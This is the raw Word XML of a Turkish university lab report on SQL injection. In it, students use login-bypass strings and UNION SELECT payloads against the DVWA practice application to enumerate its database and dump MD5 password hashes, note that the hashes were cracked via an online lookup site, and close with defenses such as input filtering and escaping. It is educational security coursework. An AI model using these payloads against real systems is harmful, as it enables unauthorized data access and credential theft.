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233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34125A03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3F13E5C1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7961ED95" w14:textId="77777777" w:rsidR="003F0351" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="-28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71C2100" wp14:editId="1D2AD5DE">
            <wp:extent cx="1582764" cy="1582764"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="image1.png" descr="Yıldız Teknik Üniversitesi - Vikipe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Yıldız Teknik Üniversitesi - Vikipe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4707B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22BBE232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1CE164E5" w14:textId="77777777" w:rsidR="003F035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YILDIZ TECHNICAL UNIVERSITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE858AC" w14:textId="77777777" w:rsidR="003F035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ELECTRICAL AND ELECTRONICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E69CB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4D6A23" w14:textId="77777777" w:rsidR="003F0351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SECURITY OF COMPUTER SYSTEMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED8EF1" w14:textId="77777777" w:rsidR="003F0351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(BLM4011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69917F4D" w14:textId="2954B318" w:rsidR="003F0351" w:rsidRDefault="0048507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8507C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>LAB 2 – SQL INJECTION</w:t>
      </w:r>
      <w:r w:rsidRPr="0048507C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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>LAB REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD9F51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465A0F2" w14:textId="1FF20D1D" w:rsidR="003F0351" w:rsidRDefault="00485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20011701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Muhammet Ali ŞEN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ID – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Muhammed Ali LALE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC386E" w14:textId="610CB202" w:rsidR="003F0351" w:rsidRDefault="00485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Ali.sen@std.yildiz.edu.tr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00000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e-mail</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="406DCFF8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D0282C" w14:textId="77777777" w:rsidR="003F035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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA1F9F8" w14:textId="77777777" w:rsidR="003F035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3FFA512" w14:textId="016E4041" w:rsidR="003F0351" w:rsidRDefault="00485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GİRİŞ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33059521" w14:textId="77777777" w:rsidR="003F0351" w:rsidRDefault="003F03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6A254" w14:textId="08043035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özet olarak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stringler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ile sorgulara müdahalede bulunup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veritabanına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erişerek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veritabanındaki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bilgileri görüntülemek şeklinde açıklanabilir.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Bir kullanıcı giriş formunda kullanıcı ve şifrenin doğruluğunu şu şekilde kontrol ederiz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749E7942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EC5D8" w14:textId="77777777" w:rsidR="0048507C" w:rsidRPr="001765F1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proofErr w:type="gram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”'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”'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C18ECD3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23025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Biz eğer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injeciton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kontrolü yapmadıysak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alanına ' OR '1'='1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sorgusunu şu hale getirilerek yani %100 doğru olarak kabul ettirerek kolayca sistemdeki kullanıcı adı ve şifre bilgileri çalınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DDEF3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ECC25" w14:textId="77777777" w:rsidR="0048507C" w:rsidRPr="001765F1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proofErr w:type="gram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='”uname'OR'1'='1”'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='”pass'OR'1'='1”'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A864E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6D7B2" w14:textId="0AA0B8B0" w:rsidR="003F0351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 sorguda her 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>taraftada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1=1 olduğundan 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48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koşulu sağlandığından tüm kullanıcı adı ve şifreler sorgu sonucu olarak çıkmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9F4DA" w14:textId="2F6EB8D9" w:rsid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4C0F6" w14:textId="3637EC67" w:rsidR="00CA1791" w:rsidRPr="00CA1791" w:rsidRDefault="00CA1791" w:rsidP="00CA1791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17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</w:p>
    <w:p w14:paraId="45B61DDF" w14:textId="77777777" w:rsidR="00CA1791" w:rsidRDefault="00CA1791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9C353" w14:textId="58FEB842" w:rsidR="0048507C" w:rsidRDefault="0048507C" w:rsidP="001765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DVWA uygulamamızı gerekli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php.ini dosyalarında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ayarları yapıldıktan sonra aktif olarak çalıştırdık. DVWA Security menüsünden Security Level ayarını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ettik. Akabinde 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menüsüne gelerek User ID isimli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kutucuğuna öncelikle bir çentik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 atarak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olup olmadığını test ettik. </w:t>
      </w:r>
      <w:r w:rsidR="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dönen sonuç;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFB1D7" w14:textId="0C86543C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10D41" w14:textId="77777777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syntax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manual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corresponds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syntax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''0''' at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185A2E15" w14:textId="79AE5436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193E1" w14:textId="5D9C2F43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Görüldüğü üzere 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hatası alınması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olduğuna yönelik şüphe uyandırdı. Akabinde sayfa altında yer alan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ile kaynak kodlarına baktık. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE11B4" w14:textId="3B8A039A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5CCCA" w14:textId="77777777" w:rsidR="00016D08" w:rsidRPr="00016D08" w:rsidRDefault="00016D08" w:rsidP="0001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D0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FFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman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gramStart"/>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>query  </w:t>
      </w:r>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"SELECT first_name, last_name FROM users WHERE user_id = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$id</w:t>
      </w:r>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>';"</w:t>
      </w:r>
      <w:r w:rsidRPr="00016D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B90349" w14:textId="6F2D470A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B33E8" w14:textId="2B6FDC19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Görülüğü üzere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olarak girilen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query’e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doğrudan parametre olarak gönderildiğini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farkettik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Artık sömürülebilir olduğunu tahmin ettik. Akabinde </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B6380" w14:textId="36051D16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9AAEE" w14:textId="4BD66F24" w:rsid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proofErr w:type="gram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() #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7298CF" w14:textId="535D4126" w:rsid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B5C25" w14:textId="30DC401C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 sorgu sonucu Database ve Versiyon bilgilerini aldık. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9430AB" w14:textId="2C1BC6F8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F448C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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>union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database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),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>() #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">First name: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admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CC59FC7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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>union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database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),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>() #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">First name: 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10.4.21-MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACF06F" w14:textId="659484CC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82E02" w14:textId="77777777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52DB0" w14:textId="49F7CC45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AC45A" w14:textId="24D871ED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adımızın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olduğunu öğrenmemiz üzerine artık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tablolarını öğrenebiliriz. Bu nedenle altta yer alan sorguyu gönderdik.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD320FA" w14:textId="5DA4E831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C83AF" w14:textId="4684652D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UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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null,table</w:t>
      </w:r>
      <w:proofErr w:type="gram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information_schema.tables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table_schema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dvwa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' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42FA74" w14:textId="52FFD180" w:rsidR="00016D08" w:rsidRDefault="00CA1791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2CB610" w14:textId="77777777" w:rsidR="00016D08" w:rsidRDefault="00016D08" w:rsidP="00016D08">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ID:  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">First name: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admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6551411A" w14:textId="77777777" w:rsidR="00016D08" w:rsidRDefault="00016D08" w:rsidP="00016D08">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ID:  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">First name: 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guestbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="793B729D" w14:textId="168ECE2E" w:rsidR="00016D08" w:rsidRDefault="00016D08" w:rsidP="00016D08">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ID:  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">First name: 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users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3249A1E7" w14:textId="77777777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390A0" w14:textId="67FDACDD" w:rsidR="00016D08" w:rsidRDefault="00016D08" w:rsidP="001765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dvwa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isimli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veritabanımızda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guestbook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isimli tabloların olduğunu anladık.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tablomuzu inceleyerek kullanıcı bilgilerini alabileceğimizi anladık. Bu nedenle aşağıdaki sorguyu gönderdik.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD775A" w14:textId="10385BBD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4234C" w14:textId="0E8061A1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UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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null,table</w:t>
      </w:r>
      <w:proofErr w:type="gram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information_schema.tables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table_schema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dvwa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' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D66EF" w14:textId="6DAF5740" w:rsidR="00016D08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061214" wp14:editId="249218CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>43788</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309137</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5496128" cy="4243846"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0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39" cy="42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AB32B68" w14:textId="3DBA6CAE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Artık tabloda yer alan şema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bilgilerini öğrenmiş olduk. Bundan sonra istediğimiz bilgileri tablodan çekebileceğimizi öğrendik. Tablomuzda yer alan kullanıcıların </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD23B4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şifrelerini öğrenebiliriz. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A21516D" w14:textId="7B3D9757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729A3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1' UNION SELECT "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Listele :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">("ID:",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>, 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: ",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users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> #)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E3CF28" w14:textId="6AE6C164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5FBEF" w14:textId="32DD8998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</w:p>
    <w:p w14:paraId="3AAC8D79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 1' UNION SELECT "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Listele :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">("ID:",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>, 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: ",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users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> #) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>First name: Listele :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ID:1password: 5f4dcc3b5aa765d61d8327deb882cf99,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3CD79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ID:2password: e99a18c428cb38d5f260853678922e03,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FDAAB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ID:3password: 8d3533d75ae2c3966d7e0d4fcc69216b,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677325FB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ID:4password: 0d107d09f5bbe40cade3de5c71e9e9b7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFA42D8" w14:textId="77147901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ID:5password: 5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F44CCE" w14:textId="2A69F9B4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9D38F2" w14:textId="70C986B1" w:rsidR="00BD23B4" w:rsidRDefault="00BD23B4" w:rsidP="0017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0F6104A" wp14:editId="13FBE3B3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>53664</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2064534</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="299720"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21051"/>
                <wp:lineTo x="21571" y="21051"/>
                <wp:lineTo x="21571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27666D5" wp14:editId="7B30BE16">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-4701</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1673225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="389255"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21142"/>
                <wp:lineTo x="21571" y="21142"/>
                <wp:lineTo x="21571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61D240" wp14:editId="20B25021">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-5080</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1201974</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="322580"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20409"/>
                <wp:lineTo x="21571" y="20409"/>
                <wp:lineTo x="21571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B5779" wp14:editId="00BBD5FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-5080</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>845347</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="363855"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21110"/>
                <wp:lineTo x="21571" y="21110"/>
                <wp:lineTo x="21571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Görüldüğü gibi şifrelerin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değerleri tutulmaktadır. Eğer şifreler belli karakter sayısından az ve/veya sadece harf/sayı ve/veya en çok kullanılan şifreler arasındaysa </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00076E41">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://crackstation.net/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gibi siteler üzerinden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kodları kırılabilir. Kullanıcıların ha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değeri belirtilen sitede sorgulanmıştır. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50100132" w14:textId="08BC7BBA" w:rsidR="00BD23B4" w:rsidRDefault="00BD23B4" w:rsidP="00BD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9860D" w14:textId="493B74F5" w:rsidR="00CA1791" w:rsidRPr="00016D08" w:rsidRDefault="00BD23B4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Görüldüğü üzere şifreler kolay bir şekilde kırılacak şekilde olduğundan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değerlerinden orijinal şifrelere ulaşılmıştır. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFDC2A8" w14:textId="418A09E5" w:rsidR="003F0351" w:rsidRDefault="003F0351" w:rsidP="00BD23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86E1D" w14:textId="533420C6" w:rsidR="00BD23B4" w:rsidRDefault="00BD23B4" w:rsidP="00BD23B4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SONUÇLAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D0D8DB" w14:textId="239EAC3D" w:rsidR="003F0351" w:rsidRPr="00CA07E4" w:rsidRDefault="00BD23B4" w:rsidP="00CA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açığı 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teknolojilerinin gelişmesi ise engellenmektedir. Artık güncel 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tasarlanan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uygulamalarında önyüzden yapılan sorgular doğrudan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gönderilmemekte arada birçok katmandan bu sorgular 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birer filtreden geçmektedir. Bu tip saldırıları engellemek için hem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hem de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tarafında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Regular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ile belirli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paterne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uymayan veya doğrudan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sorgusu olarak anlamlandırılabilecek durumları </w:t>
      </w:r>
      <w:r w:rsidR="006474F6" w:rsidRP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(örnek olarak çentik </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006474F6" w:rsidRP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‘ sadece</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006474F6" w:rsidRP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belirli şartlarla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006474F6" w:rsidRP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sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006474F6" w:rsidRP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sorgusuna parametre olarak girebilmesi)</w:t>
      </w:r>
      <w:r w:rsidR="006474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belirli filtrelerden geçirerek engelleme uygulanan yöntemlerden biridir. Ayrıca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injecitondan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kontrolünün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dilindeki en temel yöntemi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006474F6" w:rsidRPr="006474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mysql_real_escape_string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fonksiyonudur.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 fonksiyon gelen değerden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escape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karakterleri (</w:t>
      </w:r>
      <w:proofErr w:type="gram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',/</w:t>
      </w:r>
      <w:proofErr w:type="gram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vb.) temizleyerek web sitesini temel düzeyde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injectionlara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006474F6" w:rsidRP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karşı korur. </w:t>
      </w:r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özelinde olmamakla birlikte günümüz web teknolojileri gelişmekte olduğu gibi Siber Saldırı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yöntemleride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gelişmekte ve değişmektedir. Bu nedenle Siber Güvenlik </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>metodları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0064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saldırılara karşı tespit ve engelleme faaliyetleri de gelişmeye ve kendini güncellemeye mecburdur. </w:t>
      </w:r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Yukarıda tespiti yapılan ve örneklendirilen SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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yöntemi dışında birçok yöntemle bu açıkları bulunmakta ve sömürülmektedir. Bu tip saldırılara yönelik</w:t>
      </w:r>
      <w:r w:rsidR="001765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alınan</w:t>
      </w:r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tedbirler de her geçen gün </w:t>
      </w:r>
      <w:r w:rsidR="001765F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>değişmekte</w:t>
      </w:r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</w:t>
      </w:r>
      <w:r w:rsidR="001765F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gelişmektedir</w:t>
      </w:r>
      <w:r w:rsidR="00CA0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sectPr w:rsidR="003F0351" w:rsidRPr="00CA07E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EAA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B1F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72050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6209">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1598714915">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="86004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51"/>
    <w:rsid w:val="00016D08"/>
    <w:rsid w:val="001765F1"/>
    <w:rsid w:val="003F0351"/>
    <w:rsid w:val="0048507C"/>
    <w:rsid w:val="006474F6"/>
    <w:rsid w:val="00BD23B4"/>
    <w:rsid w:val="00CA07E4"/>
    <w:rsid w:val="00C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961B"/>
  <w15:docId w15:val="{F271B0FB-4EC2-A149-B28B-57698F3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6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6D08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CA179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23B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ackstation.ne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MUHAMMET ALİ ŞEN</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-10T19:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-10T19:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>